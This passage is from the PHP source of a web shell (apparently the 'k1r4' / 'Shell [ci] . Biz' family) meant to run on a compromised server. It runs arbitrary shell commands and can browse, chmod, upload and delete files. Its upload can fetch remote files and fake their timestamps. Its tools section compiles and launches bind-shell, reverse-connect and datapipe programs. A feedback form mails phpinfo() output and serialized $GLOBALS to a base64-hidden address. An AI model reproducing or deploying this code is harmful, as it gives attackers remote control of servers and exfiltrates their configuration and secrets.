if ($act == "update") {$ret = k1r4_getupdate(!!$confirmupdate); echo "<b>".$ret."</b>"; if (stristr($ret,"new version")) {echo "<br><br><input type=button onclick=\"location.href='".$surl."act=update&confirmupdate=1';\" value=\"Update now\">";}} | |
if ($act == "feedback") | |
{ | |
$suppmail = base64_decode("ZnJlZXNoZWxsNTEwQGdtYWlsLmNvbQ=="); | |
if (!empty($submit)) | |
{ | |
$ticket = substr(md5(microtime()+rand(1,1000)),0,6); | |
$body = "Shell [ci] . Biz".$shver." feedback #".$ticket."\nName: ".htmlspecialchars($fdbk_name)."\nE-mail: ".htmlspecialchars($fdbk_email)."\nMessage:\n".htmlspecialchars($fdbk_body)."\n\nIP: ".$REMOTE_ADDR; | |
if (!empty($fdbk_ref)) | |
{ | |
$tmp = @ob_get_contents(); | |
ob_clean(); | |
phpinfo(); | |
$phpinfo = base64_encode(ob_get_contents()); | |
ob_clean(); | |
echo $tmp; | |
$body .= "\n"."phpinfo(): ".$phpinfo."\n"."\$GLOBALS=".base64_encode(serialize($GLOBALS))."\n"; | |
} | |
mail($suppmail,"Shell [ci] . Biz".$shver." feedback #".$ticket,$body,"FROM: ".$suppmail); | |
echo "<center><b>Thanks for your feedback! Your ticket ID: ".$ticket.".</b></center>"; | |
} | |
else {echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=feedback><b>Feedback or report bug (".str_replace(array("@","."),array("[at]","[dot]"),$suppmail)."):<br><br>Your name: <input type=\"text\" name=\"fdbk_name\" value=\"".htmlspecialchars($fdbk_name)."\"><br><br>Your e-mail: <input type=\"text\" name=\"fdbk_email\" value=\"".htmlspecialchars($fdbk_email)."\"><br><br>Message:<br><textarea name=\"fdbk_body\" cols=80 rows=10>".htmlspecialchars($fdbk_body)."</textarea><input type=\"hidden\" name=\"fdbk_ref\" value=\"".urlencode($HTTP_REFERER)."\"><br><br>Attach server-info * <input type=\"checkbox\" name=\"fdbk_servinf\" value=\"1\" checked><br><br>There are no checking in the form.<br><br>* - strongly recommended, if you report bug, because we need it for bug-fix.<br><br>We understand languages: English, Russian.<br><br><input type=\"submit\" name=\"submit\" value=\"Send\"></form>";} | |
} | |
if ($act == "search") | |
{ | |
echo "<b>Search in file-system:</b><br>"; | |
if (empty($search_in)) {$search_in = $d;} | |
if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;} | |
if (empty($search_text_wwo)) {$search_text_regexp = 0;} | |
if (!empty($submit)) | |
{ | |
$found = array(); | |
$found_d = 0; | |
$found_f = 0; | |
$search_i_f = 0; | |
$search_i_d = 0; | |
$a = array | |
( | |
"name"=>$search_name, "name_regexp"=>$search_name_regexp, | |
"text"=>$search_text, "text_regexp"=>$search_text_regxp, | |
"text_wwo"=>$search_text_wwo, | |
"text_cs"=>$search_text_cs, | |
"text_not"=>$search_text_not | |
); | |
$searchtime = getmicrotime(); | |
$in = array_unique(explode(";",$search_in)); | |
foreach($in as $v) {k1r4fsearch($v);} | |
$searchtime = round(getmicrotime()-$searchtime,4); | |
if (count($found) == 0) {echo "<b>No files found!</b>";} | |
else | |
{ | |
$ls_arr = $found; | |
$disp_fullpath = TRUE; | |
$act = "ls"; | |
} | |
} | |
echo "<form method=POST> | |
<input type=hidden name=\"d\" value=\"".$dispd."\"><input type=hidden name=act value=\"".$dspact."\"> | |
<b>Search for (file/folder name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\"> <input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".($search_name_regexp == 1?" checked":"")."> - regexp | |
<br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\"> | |
<br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea> | |
<br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".($search_text_regexp == 1?" checked":"")."> - regexp | |
<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".($search_text_wwo == 1?" checked":"")."> - <u>w</u>hole words only | |
<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".($search_text_cs == 1?" checked":"")."> - cas<u>e</u> sensitive | |
<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".($search_text_not == 1?" checked":"")."> - find files <u>NOT</u> containing the text | |
<br><br><input type=submit name=submit value=\"Search\"></form>"; | |
if ($act == "ls") {$dspact = $act; echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs (".$search_i_f." files and ".$search_i_d." folders, ".round(($search_i_f+$search_i_d)/$searchtime,4)." objects per second).</b><br><br>";} | |
} | |
if ($act == "chmod") | |
{ | |
$mode = fileperms($d.$f); | |
if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";} | |
else | |
{ | |
$form = TRUE; | |
if ($chmod_submit) | |
{ | |
$octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8); | |
if (chmod($d.$f,$octet)) {$act = "ls"; $form = FALSE; $err = "";} | |
else {$err = "Can't chmod to ".$octet.".";} | |
} | |
if ($form) | |
{ | |
$perms = parse_perms($mode); | |
echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=act value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"")."> Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"")."> Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"")."> Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>"; | |
} | |
} | |
} | |
if ($act == "upload") | |
{ | |
$uploadmess = ""; | |
$uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath); | |
if (empty($uploadpath)) {$uploadpath = $d;} | |
elseif (substr($uploadpath,-1) != "/") {$uploadpath .= "/";} | |
if (!empty($submit)) | |
{ | |
global $HTTP_POST_FILES; | |
$uploadfile = $HTTP_POST_FILES["uploadfile"]; | |
if (!empty($uploadfile["tmp_name"])) | |
{ | |
if (empty($uploadfilename)) {$destin = $uploadfile["name"];} | |
else {$destin = $userfilename;} | |
if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {$uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";} | |
} | |
elseif (!empty($uploadurl)) | |
{ | |
if (!empty($uploadfilename)) {$destin = $uploadfilename;} | |
else | |
{ | |
$destin = explode("/",$destin); | |
$destin = $destin[count($destin)-1]; | |
if (empty($destin)) | |
{ | |
$i = 0; | |
$b = ""; | |
while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} | |
} | |
if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} | |
else | |
{ | |
$st = getmicrotime(); | |
$content = @file_get_contents($uploadurl); | |
$dt = round(getmicrotime()-$st,4); | |
if (!$content) {$uploadmess .= "Can't download file!<br>";} | |
else | |
{ | |
if ($filestealth) {$stat = stat($uploadpath.$destin);} | |
$fp = fopen($uploadpath.$destin,"w"); | |
if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} | |
else | |
{ | |
fwrite($fp,$content,strlen($content)); | |
fclose($fp); | |
if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} | |
} | |
} | |
} | |
} | |
} | |
if ($miniform) | |
{ | |
echo "<b>".$uploadmess."</b>"; | |
$act = "ls"; | |
} | |
else | |
{ | |
echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=POST> | |
Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br> or<br> | |
Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> | |
Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> | |
File-name (auto-fill): <input name=uploadfilename size=25><br><br> | |
<input type=checkbox name=uploadautoname value=1 id=df4> convert file name to lovercase<br><br> | |
<input type=submit name=submit value=\"Upload\"> | |
</form>"; | |
} | |
} | |
if ($act == "delete") | |
{ | |
$delerr = ""; | |
foreach ($actbox as $v) | |
{ | |
$result = FALSE; | |
$result = fs_rmobj($v); | |
if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} | |
} | |
if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} | |
$act = "ls"; | |
} | |
if (!$usefsbuff) | |
{ | |
if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$useFSbuff\" as TRUE.</center>";} | |
} | |
else | |
{ | |
if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); k1r4_sess_put($sess_data); $act = "ls"; } | |
elseif ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); k1r4_sess_put($sess_data); $act = "ls";} | |
elseif ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} k1r4_sess_put($sess_data); $act = "ls";} | |
if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); k1r4_sess_put($sess_data);} | |
elseif ($actpastebuff) | |
{ | |
$psterr = ""; | |
foreach($sess_data["copy"] as $k=>$v) | |
{ | |
$to = $d.basename($v); | |
if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} | |
if ($copy_unset) {unset($sess_data["copy"][$k]);} | |
} | |
foreach($sess_data["cut"] as $k=>$v) | |
{ | |
$to = $d.basename($v); | |
if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} | |
unset($sess_data["cut"][$k]); | |
} | |
k1r4_sess_put($sess_data); | |
if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} | |
$act = "ls"; | |
} | |
elseif ($actarcbuff) | |
{ | |
$arcerr = ""; | |
if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} | |
else {$ext = ".tar.gz";} | |
if ($ext == ".tar.gz") {$cmdline = "tar cfzv";} | |
$cmdline .= " ".$actarcbuff_path; | |
$objects = array_merge($sess_data["copy"],$sess_data["cut"]); | |
foreach($objects as $v) | |
{ | |
$v = str_replace("\\",DIRECTORY_SEPARATOR,$v); | |
if (substr($v,0,strlen($d)) == $d) {$v = basename($v);} | |
if (is_dir($v)) | |
{ | |
if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;} | |
$v .= "*"; | |
} | |
$cmdline .= " ".$v; | |
} | |
$tmp = realpath("."); | |
chdir($d); | |
$ret = myshellexec($cmdline); | |
chdir($tmp); | |
if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";} | |
$ret = str_replace("\r\n","\n",$ret); | |
$ret = explode("\n",$ret); | |
if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} | |
foreach($sess_data["cut"] as $k=>$v) | |
{ | |
if (in_array($v,$ret)) {fs_rmobj($v);} | |
unset($sess_data["cut"][$k]); | |
} | |
k1r4_sess_put($sess_data); | |
if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} | |
$act = "ls"; | |
} | |
elseif ($actpastebuff) | |
{ | |
$psterr = ""; | |
foreach($sess_data["copy"] as $k=>$v) | |
{ | |
$to = $d.basename($v); | |
if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} | |
if ($copy_unset) {unset($sess_data["copy"][$k]);} | |
} | |
foreach($sess_data["cut"] as $k=>$v) | |
{ | |
$to = $d.basename($v); | |
if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} | |
unset($sess_data["cut"][$k]); | |
} | |
k1r4_sess_put($sess_data); | |
if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} | |
$act = "ls"; | |
} | |
} | |
if ($act == "cmd") | |
{ | |
if (trim($cmd) == "ps -aux") {$act = "processes";} | |
elseif (trim($cmd) == "tasklist") {$act = "processes";} | |
else | |
{ | |
@chdir($chdir); | |
if (!empty($submit)) | |
{ | |
echo "<b>Result of execution this command</b>:<br>"; | |
$olddir = realpath("."); | |
@chdir($d); | |
$ret = myshellexec($cmd); | |
$ret = convert_cyr_string($ret,"d","w"); | |
if ($cmd_txt) | |
{ | |
$rows = count(explode("\r\n",$ret))+1; | |
if ($rows < 10) {$rows = 10;} | |
echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; | |
} | |
else {echo $ret."<br>";} | |
@chdir($olddir); | |
} | |
else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = TRUE;}} | |
echo "<form action=\"".$surl."\" method=POST><input type=hidden name=act value=cmd><textarea name=cmd cols=122 rows=10>".htmlspecialchars($cmd)."</textarea><input type=hidden name=\"d\" value=\"".$dispd."\"><br><br><input type=submit name=submit value=\"Execute\"> Display in text-area <input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; | |
} | |
} | |
if ($act == "ls") | |
{ | |
if (count($ls_arr) > 0) {$list = $ls_arr;} | |
else | |
{ | |
$list = array(); | |
if ($h = @opendir($d)) | |
{ | |
while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;} | |
closedir($h); | |
} | |
else {} | |
} | |
if (count($list) == 0) {echo "<center><b>Can't open folder (".htmlspecialchars($d).")!</b></center>";} | |
else | |
{ | |
//Building array | |
$objects = array(); | |
$vd = "f"; //Viewing mode | |
if ($vd == "f") | |
{ | |
$objects["head"] = array(); | |
$objects["folders"] = array(); | |
$objects["links"] = array(); | |
$objects["files"] = array(); | |
foreach ($list as $v) | |
{ | |
$o = basename($v); | |
$row = array(); | |
if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} | |
elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} | |
elseif (is_dir($v)) | |
{ | |
if (is_link($v)) {$type = "LINK";} | |
else {$type = "DIR";} | |
$row[] = $v; | |
$row[] = $type; | |
} | |
elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} | |
$row[] = filemtime($v); | |
if (!$win) | |
{ | |
$ow = posix_getpwuid(fileowner($v)); | |
$gr = posix_getgrgid(filegroup($v)); | |
$row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); | |
} | |
$row[] = fileperms($v); | |
if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} | |
elseif (is_link($v)) {$objects["links"][] = $row;} | |
elseif (is_dir($v)) {$objects["folders"][] = $row;} | |
elseif (is_file($v)) {$objects["files"][] = $row;} | |
$i++; | |
} | |
$row = array(); | |
$row[] = "<b>Name</b>"; | |
$row[] = "<b>Size</b>"; | |
$row[] = "<b>Modify</b>"; | |
if (!$win) | |
{$row[] = "<b>Owner/Group</b>";} | |
$row[] = "<b>Perms</b>"; | |
$row[] = "<b>Action</b>"; | |
$parsesort = parsesort($sort); | |
$sort = $parsesort[0].$parsesort[1]; | |
$k = $parsesort[0]; | |
if ($parsesort[1] != "a") {$parsesort[1] = "d";} | |
$y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">"; | |
$y .= "<img src=\"".$surl."act=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>"; | |
$row[$k] .= $y; | |
for($i=0;$i<count($row)-1;$i++) | |
{ | |
if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";} | |
} | |
$v = $parsesort[0]; | |
usort($objects["folders"], "tabsort"); | |
usort($objects["links"], "tabsort"); | |
usort($objects["files"], "tabsort"); | |
if ($parsesort[1] == "d") | |
{ | |
$objects["folders"] = array_reverse($objects["folders"]); | |
$objects["files"] = array_reverse($objects["files"]); | |
} | |
$objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); | |
$tab = array(); | |
$tab["cols"] = array($row); | |
$tab["head"] = array(); | |
$tab["folders"] = array(); | |
$tab["links"] = array(); | |
$tab["files"] = array(); | |
$i = 0; | |
foreach ($objects as $a) | |
{ | |
$v = $a[0]; | |
$o = basename($v); | |
$dir = dirname($v); | |
if ($disp_fullpath) {$disppath = $v;} | |
else {$disppath = $o;} | |
$disppath = str2mini($disppath,60); | |
if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} | |
elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} | |
foreach ($regxp_highlight as $r) | |
{ | |
if (ereg($r[0],$o)) | |
{ | |
if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; k1r4exit();} | |
else | |
{ | |
$r[1] = round($r[1]); | |
$isdir = is_dir($v); | |
if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) | |
{ | |
if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";} | |
$disppath = $r[2].$disppath.$r[3]; | |
if ($r[4]) {break;} | |
} | |
} | |
} | |
} | |
$uo = urlencode($o); | |
$ud = urlencode($dir); | |
$uv = urlencode($v); | |
$row = array(); | |
if ($o == ".") | |
{ | |
$row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\"> <a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; | |
$row[] = "LINK"; | |
} | |
elseif ($o == "..") | |
{ | |
$row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\"> <a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; | |
$row[] = "LINK"; | |
} | |
elseif (is_dir($v)) | |
{ | |
if (is_link($v)) | |
{ | |
$disppath .= " => ".readlink($v); | |
$type = "LINK"; | |
$row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"16\" border=\"0\"> <a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; | |
} | |
else | |
{ | |
$type = "DIR"; | |
$row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\"> <a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; | |
} | |
$row[] = $type; | |
} | |
elseif(is_file($v)) | |
{ | |
$ext = explode(".",$o); | |
$c = count($ext)-1; | |
$ext = $ext[$c]; | |
$ext = strtolower($ext); | |
$row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\"> <a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; | |
$row[] = view_size($a[1]); | |
} | |
$row[] = date("d.m.Y H:i:s",$a[2]); | |
if (!$win) {$row[] = $a[3];} | |
$row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>"; | |
if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;} | |
else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";} | |
if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a> ".$checkbox;} | |
else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a> <a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a> <a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" alt=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a> ".$checkbox;} | |
if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} | |
elseif (is_link($v)) {$tab["links"][] = $row;} | |
elseif (is_dir($v)) {$tab["folders"][] = $row;} | |
elseif (is_file($v)) {$tab["files"][] = $row;} | |
$i++; | |
} | |
} | |
// Compiling table | |
$table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); | |
echo "<center><b>Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):</b></center><br><TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#000000 borderColorLight=#433333 border=0><form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=act value=".$dspact."><input type=hidden name=d value=".$d.">"; | |
foreach($table as $row) | |
{ | |
echo "<tr>\r\n"; | |
foreach($row as $v) {echo "<td>".$v."</td>\r\n";} | |
echo "</tr>\r\n"; | |
} | |
echo "</table><hr size=\"1\" noshade><p align=\"right\"> | |
<script> | |
function ls_setcheckboxall(status) | |
{ | |
var id = 1; | |
var num = ".(count($table)-2)."; | |
while (id <= num) | |
{ | |
document.getElementById('actbox'+id).checked = status; | |
id++; | |
} | |
} | |
function ls_reverse_all() | |
{ | |
var id = 1; | |
var num = ".(count($table)-2)."; | |
while (id <= num) | |
{ | |
document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; | |
id++; | |
} | |
} | |
</script> | |
<input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\"> <input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\"> | |
<b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; | |
if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) | |
{ | |
echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\"> <input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\"> <input type=submit name=\"actpastebuff\" value=\"Paste\"> <input type=submit name=\"actemptybuff\" value=\"Empty buffer\"> "; | |
} | |
echo "<select name=act><option value=\"".$act."\">With selected:</option>"; | |
echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>"; | |
echo "<option value=chmod".($dspact == "chmod"?" selected":"").">Change-mode</option>"; | |
if ($usefsbuff) | |
{ | |
echo "<option value=cut".($dspact == "cut"?" selected":"").">Cut</option>"; | |
echo "<option value=copy".($dspact == "copy"?" selected":"").">Copy</option>"; | |
echo "<option value=unselect".($dspact == "unselect"?" selected":"").">Unselect</option>"; | |
} | |
echo "</select> <input type=submit value=\"Confirm\"></p>"; | |
echo "</form>"; | |
} | |
} | |
if ($act == "tools") | |
{ | |
$bndportsrcs = array( | |
"k1r4_bindport.pl"=>array("Using PERL","perl %path %port"), | |
"k1r4_bindport.c"=>array("Using C","%path %port %pass") | |
); | |
$bcsrcs = array( | |
"k1r4_backconn.pl"=>array("Using PERL","perl %path %host %port"), | |
"k1r4_backconn.c"=>array("Using C","%path %host %port") | |
); | |
$dpsrcs = array( | |
"k1r4_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), | |
"k1r4_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") | |
); | |
if (!is_array($bind)) {$bind = array();} | |
if (!is_array($bc)) {$bc = array();} | |
if (!is_array($datapipe)) {$datapipe = array();} | |
if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} | |
if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} | |
if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} | |
if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} | |
if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} | |
if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} | |
if (!empty($bindsubmit)) | |
{ | |
echo "<b>Result of binding port:</b><br>"; | |
$v = $bndportsrcs[$bind["src"]]; | |
if (empty($v)) {echo "Unknown file!<br>";} | |
elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";} | |
else | |
{ | |
$w = explode(".",$bind["src"]); | |
$ext = $w[count($w)-1]; | |
unset($w[count($w)-1]); | |
$srcpath = join(".",$w).".".rand(0,999).".".$ext; | |
$binpath = $tmpdir.join(".",$w).rand(0,999); | |
if ($ext == "pl") {$binpath = $srcpath;} | |
@unlink($srcpath); | |
$fp = fopen($srcpath,"ab+"); | |
if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} | |
elseif (!$data = k1r4getsource($bind["src"])) {echo "Can't download sources!";} | |
else | |
{ | |
fwrite($fp,$data,strlen($data)); | |
fclose($fp); | |
if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} | |
$v[1] = str_replace("%path",$binpath,$v[1]); | |
$v[1] = str_replace("%port",$bind["port"],$v[1]); | |
$v[1] = str_replace("%pass",$bind["pass"],$v[1]); | |
$v[1] = str_replace("//","/",$v[1]); | |
$retbind = myshellexec($v[1]." > /dev/null &"); | |
sleep(5); | |
$sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); | |
if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} | |
else {echo "Binding... ok! Connect to <b>".getenv("SERVER_ADDR").":".$bind["port"]."</b>! You should use NetCat©, run \"<b>nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."</b>\"!<center><a href=\"".$surl."act=processes&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";} | |
} | |
echo "<br>"; | |
} | |
} | |
if (!empty($bcsubmit)) | |
{ | |
echo "<b>Result of back connection:</b><br>"; | |
$v = $bcsrcs[$bc["src"]]; | |
if (empty($v)) {echo "Unknown file!<br>";} | |
else | |
{ | |
$w = explode(".",$bc["src"]); | |
$ext = $w[count($w)-1]; | |
unset($w[count($w)-1]); | |
$srcpath = join(".",$w).".".rand(0,999).".".$ext; | |
$binpath = $tmpdir.join(".",$w).rand(0,999); | |
if ($ext == "pl") {$binpath = $srcpath;} | |
@unlink($srcpath); | |
$fp = fopen($srcpath,"ab+"); | |
if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} | |
elseif (!$data = k1r4getsource($bc["src"])) {echo "Can't download sources!";} | |
else | |
{ | |
fwrite($fp,$data,strlen($data)); | |
fclose($fp); | |
if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} | |
$v[1] = str_replace("%path",$binpath,$v[1]); | |
$v[1] = str_replace("%host",$bc["host"],$v[1]); | |
$v[1] = str_replace("%port",$bc["port"],$v[1]); | |
$v[1] = str_replace("//","/",$v[1]); | |
$retbind = myshellexec($v[1]." > /dev/null &"); | |
echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...<br>"; | |
} | |
} | |
} | |
if (!empty($dpsubmit)) | |
{ | |
echo "<b>Result of datapipe-running:</b><br>"; | |
$v = $dpsrcs[$datapipe["src"]]; | |
if (empty($v)) {echo "Unknown file!<br>";} | |
elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";} | |
else | |
{ | |
$srcpath = $tmpdir.$datapipe["src"]; | |
$w = explode(".",$datapipe["src"]); | |
